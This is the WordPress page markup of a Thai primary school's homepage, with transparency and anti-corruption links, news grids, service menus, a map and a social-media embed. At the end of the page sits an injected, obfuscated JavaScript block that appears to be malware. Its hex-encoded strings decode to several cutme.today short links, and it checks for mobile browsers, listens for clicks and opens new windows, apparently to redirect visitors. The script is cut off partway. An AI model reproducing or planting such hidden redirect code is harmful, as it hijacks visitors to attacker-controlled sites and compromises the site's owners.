{\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const 